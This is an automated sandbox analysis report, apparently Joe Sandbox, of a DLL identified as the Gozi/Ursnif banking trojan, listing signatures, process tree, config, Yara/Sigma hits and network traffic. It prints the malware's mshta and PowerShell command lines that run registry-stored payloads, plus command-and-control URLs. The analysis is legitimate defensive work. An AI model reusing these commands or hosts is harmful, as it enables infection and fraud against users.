Play interactive tour

Edit tour

Analysis Report u8xtCk7fq8.dll

Overview

General Information

Sample Name:	u8xtCk7fq8.dll
Analysis ID:	352339
MD5:	913c77883aa2e28ec98e5cf86d6fc2cb
SHA1:	5a5c60b32770cb4654269a812d07e13767ad7ed6
SHA256:	ae55975bd40147ab3b9a02f1e2e0279f714bce9845d26ace252cd590a42d733d
Tags:	dll
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Hooks registry keys query functions (used to hide registry keys)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6224 cmdline: loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)

rundll32.exe (PID: 6352 cmdline: rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 3728 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6548 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 2268 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6600 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4616 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5452 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 3540 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 3548 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6684 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4660 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6556 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

mshta.exe (PID: 1864 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6200 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6444 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "204", "system": "ec5da33e47422f50fe45e0bf35be0dd0hh", "size": "201288", "crc": "2", "action": "00000000", "id": "3300", "time": "1613152798", "user": "3d11f4f58695dc15e71ab15c2c196ce3", "hash": "0x4e2f3f66", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6224	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6352	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 6200	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 26 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3548, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline', ProcessId: 6684

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3540, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 3548

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo	Avira URL Cloud: Label: malware
Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0	Avira URL Cloud: Label: malware
Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/	Avira URL Cloud: Label: malware
Source: http://c56.lepini.at/jvassets/xI/t64.dat	Avira URL Cloud: Label: phishing
Source: http://golang.feel500.at/favicon.ico	Avira URL Cloud: Label: malware
Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: loaddll32.exe.6224.0.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "204", "system": "ec5da33e47422f50fe45e0bf35be0dd0hh", "size": "201288", "crc": "2", "action": "00000000", "id": "3300", "time": "1613152798", "user": "3d11f4f58695dc15e71ab15c2c196ce3", "hash": "0x4e2f3f66", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: go.in100k.at	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: u8xtCk7fq8.dll

Virustotal: Detection: 33%

Perma Link

Machine Learning detection for sample

Show sources

Source: u8xtCk7fq8.dll

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: u8xtCk7fq8.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.586036318.0000023E99060000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.590796199.000002D199FF0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp

Spreading:

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_009C888D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009BE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_009BE0BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_009D4FE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_00CA888D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_00C9E0BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_00CB4FE1

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009C05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

0_2_009C05EF

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: go.in100k.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: go.in100k.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/tImL8jZlII9uy/Sa8Z12vW/JG0sDCYv96mnYtDsn1Jnt3e/XYTd0GATXg/XwcDwpCd2vvNyexYh/5IBZNKPDd82e/Sfq1uBktd3t/JAcKip5_2F1iiz/RPTyTdp7IDHiXyZe31kKi/YwPGUHlbAVrZQiJG/SzxK0AoLMu7pJz8/amcTh_2FxtM1YghDIM/RJhzMBJ32/UeEsYhC9E1juxsvgDHu2/XGHdHL4mrBZhgHYHQrE/_2FfBJOhnZDsrt5kghDKCq/x6jFt9w2z9sQ_/2BbtS3lh/ua5XHXz43d5GTeWt38fFqSh/tbGXpr_2B/jQf9TsE9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/WpBs3eblZL2bM/eqngm5Qw/I8JSfPJ_2Fa8Gc3pObm8uim/9flcMVIzEU/MRqomoxt8Q2O1JJ03/ZSj1o2HmPZtK/O9QP218enUp/m1K_2FgloiW3rF/oEuojNadbJqe6VOrFglrs/Ndi7e_2Br7N9yDeG/5hb81boaOqEuw3E/kxHEh7CU8L_2FQm9GN/dbnlxd_2B/J8a13_2FHiOHS5rUu68O/mOTX7eo0S_2BSz_2F55/SPIJ116DNn5HQ6QSsDbLuG/U7BuZ1ELETSnp/HKm0Yev_/2BYuFboTfZStfkhwMh7_2Fr/vWxqAs_2B4/ppPPRk2wwNFmF70Ei/cPOuG4TRxPLy6vkSp/GbYUyI HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: go.in100k.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: go.in100k.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
